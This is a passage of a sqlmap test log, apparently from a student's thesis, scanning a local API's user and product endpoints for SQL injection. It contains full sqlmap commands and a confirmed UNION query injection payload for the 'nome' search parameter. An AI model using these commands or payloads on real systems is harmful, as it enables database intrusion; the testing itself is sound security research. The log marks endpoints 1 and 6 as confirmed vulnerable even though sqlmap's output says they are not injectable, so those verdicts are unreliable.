================================================================================
  SQLMAP - Teste Automatizado de SQL Injection
  Configuração: com_framework_sem_orm_com_sanitizacao
  Descrição:    COM FRAMEWORK | SEM ORM | COM SANITIZACAO
  Data:         2026-05-31 22:24:36
  Base URL:     http://localhost:8000
  Level: 1 | Risk: 1
  Total de endpoints: 12
  Doc OpenAPI:  C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\docs\ia-generated\com_framework_sem_orm_com_sanitizacao.json
================================================================================

--------------------------------------------------------------------------------
[1/12] Testando: usuarios_listar
  Método:    GET
  Path:      /usuarios
  Descrição: Listar todos os usuários
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/usuarios"

  [!!!] VULNERABILIDADE ENCONTRADA em usuarios_listar
        -> SQL Injection confirmada

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[']_____ ___ ___  {1.10.5.3#dev}
  |_ -| . [']     | .'| . |
  |___|_  [)]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:24:37 /2026-05-31/
  
  [22:24:37] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output' as the output directory
  [22:24:37] [INFO] loading tamper module 'space2comment'
  [22:24:37] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:24:37] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
  do you want to try URI injections in the target URL itself? [Y/n/q] Y
  [22:24:37] [INFO] flushing session file
  [22:24:37] [INFO] testing connection to the target URL
  [22:24:37] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:24:37] [INFO] testing if the target URL content is stable
  [22:24:37] [INFO] target URL content is stable
  [22:24:37] [INFO] testing if URI parameter '#1*' is dynamic
  [22:24:37] [WARNING] URI parameter '#1*' does not appear to be dynamic
  [22:24:37] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
  [22:24:37] [INFO] testing for SQL injection on URI parameter '#1*'
  [22:24:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  [22:24:37] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
  [22:24:37] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
  [22:24:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  [22:24:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
  [22:24:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  [22:24:38] [INFO] testing 'Generic inline queries'
  [22:24:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
  [22:24:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
  [22:24:38] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
  [22:24:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
  [22:24:38] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  [22:24:38] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
  [22:24:38] [INFO] testing 'Oracle AND time-based blind'
  it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
  [22:24:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  [22:24:38] [WARNING] URI parameter '#1*' does not seem to be injectable
  [22:24:38] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests
  [22:24:38] [WARNING] HTTP error codes detected during run:
  404 (Not Found) - 73 times
  
  [*] ending @ 22:24:38 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[2/12] Testando: usuarios_criar
  Método:    POST
  Path:      /usuarios
  Descrição: Criar usuário
  Body:      {"nome": "Teste SQLMap", "email": "sqlmap@teste.com", "senha": "senha123"}
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/usuarios" --method=POST --data='{"nome": "Teste SQLMap", "email": "sqlmap@teste.com", "senha": "senha123"}' --headers="Content-Type: application/json"

  [?] Resultado inconclusivo para usuarios_criar

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[(]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . [']     | .'| . |
  |___|_  ["]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:24:38 /2026-05-31/
  
  [22:24:38] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output' as the output directory
  [22:24:38] [INFO] loading tamper module 'space2comment'
  [22:24:38] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Safari/605.1.15' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:24:38] [INFO] flushing session file
  [22:24:39] [INFO] testing connection to the target URL
  [22:24:39] [WARNING] the web server responded with an HTTP error code (422) which could interfere with the results of the tests
  [22:24:39] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:24:39] [INFO] testing if the target URL content is stable
  [22:24:39] [INFO] target URL content is stable
  [22:24:39] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
  [22:24:39] [WARNING] HTTP error codes detected during run:
  422 (Unprocessable Entity) - 3 times
  
  [*] ending @ 22:24:39 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[3/12] Testando: usuarios_obter
  Método:    GET
  Path:      /usuarios/1
  Descrição: Obter usuário por ID
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/usuarios/1"

  [?] Resultado inconclusivo para usuarios_obter

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[.]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . [']     | .'| . |
  |___|_  [(]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:24:40 /2026-05-31/
  
  [22:24:40] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output' as the output directory
  [22:24:40] [INFO] loading tamper module 'space2comment'
  [22:24:40] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:24:40] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
  do you want to try URI injections in the target URL itself? [Y/n/q] Y
  [22:24:40] [INFO] flushing session file
  [22:24:40] [INFO] testing connection to the target URL
  [22:24:40] [CRITICAL] page not found (404)
  it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] Y
  [22:24:40] [WARNING] HTTP error codes detected during run:
  404 (Not Found) - 1 times
  
  [*] ending @ 22:24:40 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[4/12] Testando: usuarios_atualizar
  Método:    PUT
  Path:      /usuarios/1
  Descrição: Atualizar usuário
  Body:      {"nome": "Teste Atualizado", "email": "update@teste.com", "senha": "nova123"}
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/usuarios/1" --method=PUT --data='{"nome": "Teste Atualizado", "email": "update@teste.com", "senha": "nova123"}' --headers="Content-Type: application/json"

  [?] Resultado inconclusivo para usuarios_atualizar

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[']_____ ___ ___  {1.10.5.3#dev}
  |_ -| . [.]     | .'| . |
  |___|_  [)]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:24:40 /2026-05-31/
  
  [22:24:40] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output' as the output directory
  [22:24:40] [INFO] loading tamper module 'space2comment'
  [22:24:40] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:24:41] [INFO] testing connection to the target URL
  [22:24:41] [WARNING] the web server responded with an HTTP error code (422) which could interfere with the results of the tests
  [22:24:41] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:24:41] [INFO] testing if the target URL content is stable
  [22:24:41] [INFO] target URL content is stable
  [22:24:41] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
  [22:24:41] [WARNING] HTTP error codes detected during run:
  422 (Unprocessable Entity) - 3 times
  
  [*] ending @ 22:24:41 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[5/12] Testando: usuarios_busca_nome
  Método:    GET
  Path:      /usuarios/busca/
  Descrição: Buscar usuários por nome
  Params:    nome=teste
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/usuarios/busca/?nome=teste"

  [!!!] VULNERABILIDADE ENCONTRADA em usuarios_busca_nome
        -> Parâmetro vulnerável detectado
        -> SQL Injection confirmada
        -> DBMS identificado

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[.]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . [.]     | .'| . |
  |___|_  [']_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:24:42 /2026-05-31/
  
  [22:24:42] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output' as the output directory
  [22:24:42] [INFO] loading tamper module 'space2comment'
  [22:24:42] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/139 Version/16.0 Safari/605.1.15' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:24:42] [INFO] flushing session file
  [22:24:42] [INFO] testing connection to the target URL
  [22:24:42] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:24:42] [INFO] testing if the target URL content is stable
  [22:24:42] [INFO] target URL content is stable
  [22:24:42] [INFO] testing if GET parameter 'nome' is dynamic
  [22:24:42] [WARNING] GET parameter 'nome' does not appear to be dynamic
  [22:24:42] [WARNING] heuristic (basic) test shows that GET parameter 'nome' might not be injectable
  [22:24:42] [INFO] testing for SQL injection on GET parameter 'nome'
  [22:24:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  [22:24:42] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
  [22:24:42] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
  [22:24:42] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  [22:24:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
  [22:24:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  [22:24:43] [INFO] testing 'Generic inline queries'
  [22:24:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
  [22:24:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
  [22:24:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
  [22:24:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
  [22:24:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  [22:24:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
  [22:24:43] [INFO] testing 'Oracle AND time-based blind'
  it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
  [22:24:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  [22:24:43] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  [22:24:43] [INFO] target URL appears to have 4 columns in query
  [22:24:43] [WARNING] applying generic concatenation (CONCAT)
  [22:24:43] [WARNING] reflective value(s) found and filtering out
  [22:24:43] [INFO] GET parameter 'nome' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
  [22:24:43] [INFO] checking if the injection point on GET parameter 'nome' is a false positive
  GET parameter 'nome' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
  sqlmap identified the following injection point(s) with a total of 83 HTTP(s) requests:
  ---
  Parameter: nome (GET)
      Type: UNION query
      Title: Generic UNION query (NULL) - 4 columns
      Payload: nome=teste' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qkbzq','xyZVsSXXstkcUjvmfjvpdMemmyqzLXuQbByfdjjU'),'qjbvq'),NULL-- Xkpm
  ---
  [22:24:43] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
  [22:24:43] [INFO] testing MySQL
  [22:24:43] [WARNING] the back-end DBMS is not MySQL
  [22:24:43] [INFO] testing Oracle
  [22:24:43] [WARNING] the back-end DBMS is not Oracle
  [22:24:43] [INFO] testing PostgreSQL
  [22:24:43] [WARNING] the back-end DBMS is not PostgreSQL
  [22:24:43] [INFO] testing Microsoft SQL Server
  [22:24:43] [WARNING] the back-end DBMS is not Microsoft SQL Server
  [22:24:43] [INFO] testing SQLite
  [22:24:43] [INFO] confirming SQLite
  [22:24:43] [INFO] actively fingerprinting SQLite
  [22:24:43] [INFO] the back-end DBMS is SQLite
  back-end DBMS: SQLite
  [22:24:43] [WARNING] HTTP error codes detected during run:
  500 (Internal Server Error) - 44 times
  [22:24:43] [INFO] fetched data logged to text files under 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output\localhost'
  
  [*] ending @ 22:24:43 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[6/12] Testando: produtos_listar
  Método:    GET
  Path:      /produtos
  Descrição: Listar todos os produtos
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/produtos"

  [!!!] VULNERABILIDADE ENCONTRADA em produtos_listar
        -> SQL Injection confirmada

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[']_____ ___ ___  {1.10.5.3#dev}
  |_ -| . [,]     | .'| . |
  |___|_  [.]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:24:43 /2026-05-31/
  
  [22:24:43] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output' as the output directory
  [22:24:43] [INFO] loading tamper module 'space2comment'
  [22:24:43] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Safari/605.1.15 Ddg/18.6' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:24:44] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
  do you want to try URI injections in the target URL itself? [Y/n/q] Y
  [22:24:44] [INFO] flushing session file
  [22:24:44] [INFO] testing connection to the target URL
  [22:24:44] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:24:44] [INFO] testing if the target URL content is stable
  [22:24:44] [INFO] target URL content is stable
  [22:24:44] [INFO] testing if URI parameter '#1*' is dynamic
  [22:24:44] [WARNING] URI parameter '#1*' does not appear to be dynamic
  [22:24:44] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
  [22:24:44] [INFO] testing for SQL injection on URI parameter '#1*'
  [22:24:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  [22:24:44] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
  [22:24:44] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
  [22:24:44] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  [22:24:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
  [22:24:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  [22:24:44] [INFO] testing 'Generic inline queries'
  [22:24:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
  [22:24:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
  [22:24:44] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
  [22:24:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
  [22:24:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  [22:24:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
  [22:24:44] [INFO] testing 'Oracle AND time-based blind'
  it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
  [22:24:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  [22:24:44] [WARNING] URI parameter '#1*' does not seem to be injectable
  [22:24:44] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests
  [22:24:44] [WARNING] HTTP error codes detected during run:
  404 (Not Found) - 73 times
  
  [*] ending @ 22:24:44 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[7/12] Testando: produtos_criar
  Método:    POST
  Path:      /produtos
  Descrição: Criar produto
  Body:      {"nome": "Produto Teste", "descricao": "Desc teste", "preco": 99.9, "categoria": "Teste"}
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/produtos" --method=POST --data='{"nome": "Produto Teste", "descricao": "Desc teste", "preco": 99.9, "categoria": "Teste"}' --headers="Content-Type: application/json"

  [?] Resultado inconclusivo para produtos_criar

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[']_____ ___ ___  {1.10.5.3#dev}
  |_ -| . [,]     | .'| . |
  |___|_  [)]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:24:45 /2026-05-31/
  
  [22:24:45] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output' as the output directory
  [22:24:45] [INFO] loading tamper module 'space2comment'
  [22:24:45] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:24:45] [INFO] flushing session file
  [22:24:45] [INFO] testing connection to the target URL
  [22:24:45] [WARNING] the web server responded with an HTTP error code (422) which could interfere with the results of the tests
  [22:24:45] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:24:45] [INFO] testing if the target URL content is stable
  [22:24:46] [INFO] target URL content is stable
  [22:24:46] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
  [22:24:46] [WARNING] HTTP error codes detected during run:
  422 (Unprocessable Entity) - 3 times
  
  [*] ending @ 22:24:46 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[8/12] Testando: produtos_obter
  Método:    GET
  Path:      /produtos/1
  Descrição: Obter produto por ID
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/produtos/1"

  [?] Resultado inconclusivo para produtos_obter

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[,]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . ["]     | .'| . |
  |___|_  [.]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:24:46 /2026-05-31/
  
  [22:24:46] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output' as the output directory
  [22:24:46] [INFO] loading tamper module 'space2comment'
  [22:24:46] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.92 Safari/537.36' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:24:47] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
  do you want to try URI injections in the target URL itself? [Y/n/q] Y
  [22:24:47] [INFO] flushing session file
  [22:24:47] [INFO] testing connection to the target URL
  [22:24:47] [CRITICAL] page not found (404)
  it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] Y
  [22:24:47] [WARNING] HTTP error codes detected during run:
  404 (Not Found) - 1 times
  
  [*] ending @ 22:24:47 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[9/12] Testando: produtos_atualizar
  Método:    PUT
  Path:      /produtos/1
  Descrição: Atualizar produto
  Body:      {"nome": "Produto Atualizado", "descricao": "Nova desc", "preco": 150.0, "categoria": "Atualizado"}
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/produtos/1" --method=PUT --data='{"nome": "Produto Atualizado", "descricao": "Nova desc", "preco": 150.0, "categoria": "Atualizado"}' --headers="Content-Type: application/json"

  [?] Resultado inconclusivo para produtos_atualizar

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___["]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . [']     | .'| . |
  |___|_  [']_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:24:47 /2026-05-31/
  
  [22:24:47] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output' as the output directory
  [22:24:47] [INFO] loading tamper module 'space2comment'
  [22:24:47] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:24:47] [INFO] testing connection to the target URL
  [22:24:47] [WARNING] the web server responded with an HTTP error code (422) which could interfere with the results of the tests
  [22:24:47] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:24:47] [INFO] testing if the target URL content is stable
  [22:24:48] [INFO] target URL content is stable
  [22:24:48] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
  [22:24:48] [WARNING] HTTP error codes detected during run:
  422 (Unprocessable Entity) - 3 times
  
  [*] ending @ 22:24:48 /2026-05-31/
  
  
  
